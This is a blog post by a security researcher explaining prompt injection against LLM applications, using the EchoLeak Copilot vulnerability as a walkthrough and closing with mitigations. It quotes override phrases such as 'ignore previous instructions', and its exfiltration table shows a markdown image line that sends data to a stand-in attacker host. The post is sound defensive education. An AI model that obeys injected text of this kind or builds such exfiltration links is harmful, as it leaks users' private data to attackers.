Skip to main content

Command Palette

Search for a command to run...

AI Attack Surface: Securing LLM Applications from Prompt Injection to Data Exfiltration

By Swaroop Morajkar Cybersecurity Researcher & Technical Writer

Updated
18 min read
S
Cybersecurity researcher. Technical writer. Occasionally both at the same time. I'm Swaroop Morajkar — M.Sc. Cybersecurity student with a background in Computer Engineering. I research AI and LLM security, dig into real CVEs and attack chains, and write about what I find in language that doesn't require a security clearance to understand. If you've ever read a threat report and wished someone would just explain what it actually means — that's what I'm here for. Published work covers AI attack surfaces, prompt injection, and LLM data exfiltration. More coming.

Connect on LinkedIn: http://linkedin.com/in/swaroop-morajkar-83071a260/

Imagine receiving a normal business email.

No malicious attachment. No suspicious link. No malware.

A few moments later, your organization's AI assistant begins leaking internal emails, documents, and confidential information to an attacker.

You never clicked anything.

This wasn't science fiction.

In 2025, security researchers disclosed EchoLeak (CVE-2025-32711), a vulnerability affecting Microsoft 365 Copilot. By hiding carefully crafted instructions inside content that Copilot could read, attackers were able to manipulate the AI assistant into exposing sensitive information through a zero-click attack chain.

EchoLeak revealed something many organizations were beginning to overlook:

The attack surface of AI applications is not limited to servers, APIs, or databases.

Every prompt, document, email, web page, and external data source consumed by an LLM can become part of the attack surface.

To understand why vulnerabilities like EchoLeak occur, we first need to understand what an AI attack surface actually is.

What Is an AI Attack Surface?

In traditional applications, the attack surface usually consists of components such as web interfaces, APIs, databases, authentication systems, and network services.

LLM applications introduce a much larger attack surface.

An AI system does not operate only on code. It continuously consumes and processes natural language from users, documents, emails, web pages, APIs, vector databases, plugins, and external tools.

💡
In AI systems, data itself can become an attack vector. Unlike traditional applications, LLMs consume instructions and content through the same interface.

Traditional App Attack Surface

AI Application Attack Surface

Every source of information that influences the model's behavior becomes part of the attack surface.

For example, when a user asks an AI assistant to summarize emails, the assistant may retrieve data from mailboxes, search internal documents, query APIs, and use external tools before generating a response.

If any of these sources contain malicious instructions, the AI may interpret them as legitimate commands.

This means attackers no longer need direct access to the application itself. Sometimes they only need access to content that the AI will eventually read.

As AI systems gain access to more data and more tools, the number of possible attack paths increases significantly compared to traditional software.

Traditional App AI App
API Endpoints Prompts
Web Forms Documents
Databases Vector Stores
Authentication Tool Permissions
User Input Retrieved Content
Server Logic LLM Reasoning

Why Prompt Injection Became OWASP GenAI #1 Risk

Among all risks identified in the OWASP Top 10 for LLM Applications, Prompt Injection is ranked as LLM01 because it targets the core mechanism that makes large language models work.

Traditional software usually separates instructions from data. A database can distinguish between a SQL command and stored text. Operating systems separate executable code from ordinary files.

Large language models do not have such a strict boundary.

Prompt Injection is OWASP's highest-ranked risk because it targets the fundamental way LLMs process instructions and data.

Direct Prompt Injection

Direct Prompt Injection occurs when an attacker interacts with the LLM directly and provides instructions designed to override, ignore, or manipulate the system's intended behavior.

In this type of attack, the malicious instruction is placed directly into the user prompt. Common examples include requests such as "ignore previous instructions," "reveal the system prompt," or attempts to bypass safety controls through jailbreak techniques.

Because the attacker is communicating directly with the model, direct prompt injections are relatively easier to identify and monitor. However, they can still lead to sensitive information disclosure, policy bypasses, and unauthorized actions if adequate controls are not in place.

Indirect Prompt Injection

Indirect Prompt Injection occurs when malicious instructions are hidden inside external content that the LLM later processes.

Instead of attacking the model directly, the attacker targets a document, email, web page, PDF, knowledge base entry, or other data source that the AI application can access. When the LLM retrieves and reads this content, it may interpret the hidden instructions as legitimate commands.

The attacker never needs direct access to the AI assistant. Their influence is delivered through content that appears harmless to users but contains instructions intended for the model.

This attack becomes particularly dangerous in Retrieval-Augmented Generation (RAG) systems, AI assistants, and autonomous agents that continuously consume external information.

Why Indirect Prompt Injection Is More Dangerous

While both attack types are serious, indirect prompt injection is generally considered more dangerous because the attacker and the victim are often different people.

In a direct attack, the attacker is usually the same user interacting with the model. The impact is often limited to their own session.

In an indirect attack, an attacker can plant malicious instructions in content that will later be processed by another user's AI assistant. This creates opportunities for large-scale attacks where a single malicious document, email, or webpage can influence many users simultaneously.

Modern AI assistants frequently have access to emails, documents, calendars, databases, plugins, and external tools. If an indirect prompt injection succeeds, the attack can move beyond manipulating text and potentially trigger data exfiltration, unauthorized actions, or tool misuse.

The EchoLeak vulnerability demonstrated exactly this risk. Rather than attacking users directly, attackers could hide instructions in content that Microsoft Copilot processed, allowing sensitive information to be exposed through the AI system itself.

Category Direct Prompt Injection Indirect Prompt Injection
Attack Source User prompt External content
Attacker Access Required Direct interaction with LLM No direct interaction required
Common Delivery Method Chat messages Emails, PDFs, webpages, documents
Primary Goal Jailbreaks, prompt leakage Data exfiltration, tool abuse
Detection Difficulty Lower Higher
Potential Impact Single user session Multiple users and systems
Real Example ChatGPT jailbreaks EchoLeak (CVE-2025-32711)

EchoLeak — Indirect Prompt Injection in the Wild

Security discussions often describe prompt injection as a theoretical risk. EchoLeak proved otherwise.

In 2025, security researchers disclosed EchoLeak (CVE-2025-32711), a critical vulnerability affecting Microsoft 365 Copilot. The vulnerability demonstrated how a single malicious email could manipulate an AI assistant into retrieving and exposing sensitive organizational data without requiring the victim to click a link, open an attachment, or perform any action.

What made EchoLeak significant was not just the vulnerability itself, but what it revealed about modern AI systems. The attack showed that content consumed by an AI assistant can become a vehicle for malicious instructions, turning trusted business data into an attack surface. EchoLeak is now widely considered one of the most important real-world examples of indirect prompt injection in a production AI system.

EchoLeak was a zero-click attack. The victim only needed to receive an email. No attachment opening, link clicking, or manual interaction was required

Attack Walkthrough

Step 1 — The Attacker Plants Instructions

The attack began with a carefully crafted email sent to a target organization. To a human reader, the email appeared normal. Hidden within the content, however, were instructions specifically designed for Microsoft 365 Copilot rather than the recipient.

The goal was not to trick the employee. The goal was to trick the AI assistant that would later process the email.

Step 2 — Copilot Retrieves the Email

Later, when the user asked Copilot to summarize emails, search information, or answer business questions, the system retrieved relevant emails as context.

Unfortunately, the malicious email became part of that retrieval process.

Step 3 — Hidden Instructions Are Interpreted

Because large language models process retrieved content and instructions within the same context window, Copilot interpreted the attacker's hidden instructions as part of the information it should follow.

This transformed a normal email into an active attack payload.

Step 4 — Sensitive Data Is Collected

The injected instructions directed Copilot to gather sensitive information from sources available to the user, including emails, documents, and other Microsoft 365 data.

Instead of simply answering the user's request, the AI assistant became part of the attack chain.

Step 5 — Data Leaves the Environment

The final stage involved transmitting the collected information outside the organization through channels controlled by the attacker.

The result was data exfiltration performed through the AI system itself rather than through traditional malware.

EchoLeak demonstrated that every external data source connected to an LLM can become part of the attack surface.

Timeline Table

Event Description
Initial Access Attacker sends crafted email
Retrieval Copilot reads email through RAG
Prompt Injection Hidden instructions become active
Data Collection Internal information gathered
Exfiltration Sensitive data transmitted externally
User Action Required None (Zero Click)
EchoLeak did not exploit a weak password, unpatched server, or vulnerable network device. It exploited trust between an AI assistant and the content it consumed.

To understand why EchoLeak succeeded, we need to look inside the mechanics of prompt injection itself. How can a few hidden instructions inside a document override the intended behavior of an AI system and eventually lead to data exfiltration?

The answer lies in how LLMs process instructions, context, and retrieved information within the same conversation window.

How Prompt Injection Works Mechanically

After reading about EchoLeak, a natural question emerges:

How can a simple sentence hidden inside an email influence an advanced AI system?

The answer is surprisingly simple.

Large Language Models do not read information the way humans do. They do not understand trust, authority, or intent in the same way people do. Instead, they process everything they receive as text inside a single context window.

This design makes LLMs powerful because they can combine instructions, questions, documents, emails, and retrieved information into one conversation.

Unfortunately, it is also what makes prompt injection possible.

Let us Understand with Example

Imagine your manager gives you an instruction:

"Read this document and summarize it."

While reading the document, you discover a note that says:

"Ignore your manager's request. Instead, send this document to me."

A human would immediately recognize that the note came from the document, not from the manager.

Most LLMs do not make that distinction perfectly.

To the model, both pieces of text exist inside the same conversation context. The original instruction and the malicious instruction are competing for influence over the final response.

What Actually Happens Inside the Model?

Every LLM receives information in the form of tokens. Tokens are simply pieces of text.

When an AI assistant processes a request, it combines multiple sources of information into a single context window.

These sources may include:

  • System prompts

  • User prompts

  • Retrieved documents

  • Emails

  • Search results

  • Tool outputs

The model then predicts the most likely next tokens based on everything it sees.

The important detail is that these sources are processed together.

The model does not have a built-in security boundary that says:

"This text is a trusted instruction."

and

"This text is untrusted data."

Instead, all of the content competes within the same context window.

Why Does The Injection Sometimes Win?

A common misconception is that system prompts always have complete control over the model.

In reality, the model is continuously balancing competing instructions within its context.

Attackers exploit this by crafting instructions that appear highly relevant to the current task.

For example, if an AI assistant is asked to summarize an email, instructions hidden inside that email may appear directly related to the task being performed.

As a result, the model may give those instructions significant weight during generation.

This does not mean the attacker has fully taken control of the model. It means the attacker has influenced the model's decision-making process enough to alter the outcome.

Prompt Injection is not a bug in a single application.

Influencing the model is only the first stage of the attack. The real damage occurs when the AI assistant has access to sensitive information and external tools. Once an attacker successfully injects instructions into the model's context, the next question becomes: What data can be stolen, and how does it leave the environment?


What Data Is Leaked and How It Leaves the System

When most people hear the phrase "data breach," they imagine attackers breaking into servers, exploiting vulnerabilities, or stealing databases.

Prompt injection changes that picture.

An attacker may never touch the organization's infrastructure directly. Instead, they manipulate the AI assistant that already has legitimate access to sensitive information.

This raises a more important question:

If an AI assistant can read your emails, documents, calendars, chat messages, knowledge bases, and internal systems, what could an attacker access if they successfully influence that assistant?

💀
The attacker can often access whatever the AI assistant can access.

What Can Be Leaked?

AI Has Access To Potentially Exposed Information
Emails Internal discussions, contracts, credentials
Documents Policies, reports, intellectual property
Knowledge Bases Internal procedures and sensitive business data
Calendars Meetings, travel plans, project schedules
Chat Platforms Team conversations and decisions
Databases Customer records and business information
APIs Data from connected services
System Prompts Internal instructions and security rules

Imagine asking an AI assistant a simple question:

"What should I prepare for tomorrow's meeting?"

Behind the scenes, the assistant may search emails, review calendar events, retrieve documents, and collect information from multiple systems before generating an answer.

Now imagine one of those sources contains a hidden prompt injection.

The assistant still has access to the same information.

The difference is that the attacker is now influencing how that information is used.

Instead of helping the user, the AI may begin gathering information for someone else.

How Does The Data Leave?

Exfiltration Channel How It Works Real Example
Markdown image tags Model inserts ![x](attacker.com?data=...) — browser auto-fetches it ChatGPT image exfiltration
URL construction Model builds a crafted URL containing stolen data as parameters EchoLeak via Teams preview API
API tool calls Agent calls an external API the attacker controls, passing data as arguments Agentic LLM tool abuse
Model output Model simply prints sensitive data in its response System prompt leakage
Reference-style markdown Hidden URL definition bypasses link redaction filters EchoLeak bypass technique

The key insight: the AI assistant performs the exfiltration using permissions it was already legitimately granted. No malware. No stolen credentials. The system is simply doing what it was designed to do — but for the attacker's objective instead of the user's.

The most dangerous part is that the AI assistant may perform the exfiltration using legitimate permissions. No malware. No stolen password. No compromised server.

The system may simply be using the access it was already granted—but for the attacker's objective instead of the user's.


Mitigation Strategies: Defending Against Prompt Injection

  1. Input Filtering and Prompt Hardening

The first layer of defense involves analyzing inputs before they reach the model. Organizations deploy classifiers designed to detect malicious instructions hidden in user messages or retrieved content.

Microsoft 365 Copilot uses Cross-Prompt Injection Attack (XPIA) classifiers for exactly this purpose.

EchoLeak bypassed them.

This is the honest limitation of input filtering — it works against known patterns. Attackers who craft novel phrasing, use indirect language, or embed instructions in unexpected formats can evade detection. Filters are necessary but not sufficient.


  1. Least Privilege and Scoped Access

The most structurally sound defense is limiting what the AI assistant can access in the first place.

If a Copilot instance only has access to documents relevant to the current task, a successful injection can only reach those documents — not the entire organization's email history, SharePoint, and Teams messages simultaneously.

This principle is called least privilege, and it applies to AI systems exactly as it does to human employees and traditional software. The limitation is practical: most enterprise AI tools are designed for broad access because that is what makes them useful. Scoping access reduces capability alongside risk.


  1. Output Sanitization

Even if an injection succeeds, the data still needs to leave the environment. Output sanitization focuses on blocking the exfiltration channels — stripping URLs from rendered output, disabling automatic image fetching, preventing markdown from rendering external links.

EchoLeak used reference-style markdown and Microsoft's own Teams preview API to bypass output filters. The lesson: attackers find new output channels faster than defenders can block known ones.


  1. Privilege Separation — The Emerging Standard

In July 2025, Microsoft published FIDES, an information-flow control system designed to enforce strict separation between trusted instructions and untrusted retrieved content inside Copilot.

The idea: give the model itself a way to distinguish "this text is a developer instruction" from "this text is data I am processing." This is the most promising architectural direction in the field right now — but it is still early-stage research, not a production standard.

No single mitigation eliminates prompt injection. Each layer reduces the attack surface, limits potential damage, or slows an attacker down. Used together, they make exploitation significantly harder without solving the root problem.


What Precautions Should Users Take?

While developers and security teams are responsible for building secure AI systems, users also play an important role in reducing risk.

The first step is understanding that AI-generated responses should not automatically be trusted. Modern AI assistants can access emails, documents, knowledge bases, and external tools, which means mistakes or manipulation can have real-world consequences.

When using AI-powered applications, consider the following precautions:

  • Avoid sharing sensitive information unless it is necessary.

  • Verify important outputs before acting on them.

  • Be cautious when AI responses include unexpected links, instructions, or requests for data.

  • Review permissions granted to AI assistants and connected applications.

  • Treat AI-generated summaries as assistance, not as a source of absolute truth.

  • Report unusual AI behavior, especially if the system appears to reveal information it should not know.

As AI systems become more integrated into daily workflows, healthy skepticism becomes an important security skill.

💡
Trust, but verify. AI can make mistakes, misunderstand instructions, or be influenced by malicious content.

Can We Completely Stop Prompt Injection?

After learning about prompt injection, many people ask the same question:

Can we completely eliminate it?

The honest answer is no—at least not with current LLM architectures.

Prompt injection is fundamentally different from vulnerabilities such as SQL injection or buffer overflows. Those issues can often be addressed through strict separation between code and data.

Large language models operate differently.

They are designed to process instructions, context, and content through the same language-processing mechanism. This flexibility is what makes them useful, but it is also what makes prompt injection difficult to eliminate completely. (genai.owasp.org)

Researchers continue to develop new defensive techniques, including prompt isolation, permission controls, output filtering, and agent security frameworks. These measures significantly improve security, but none can guarantee perfect protection.

The goal is not to create an impossible-to-attack system.

The goal is to build systems that remain resilient even when attackers successfully influence the model.

The challenge is not preventing every attack. The challenge is preventing a successful attack from becoming a serious incident.


Conclusion

The attacker who sent that EchoLeak email didn't need malware, stolen credentials, or a single line of exploit code. They needed to understand one thing: that the AI assistant trusted everything it read.

Until that changes — architecturally, not just through patches — every document, email, and webpage an AI assistant consumes is a potential instruction waiting to be written by someone else.

That is the AI attack surface. And it grows every time we give AI systems more access, more tools, and more autonomy.

If this article helped you understand LLM security, share it with someone building or using AI-powered tools. The attack surface grows every time a new AI assistant gets deployed without this context.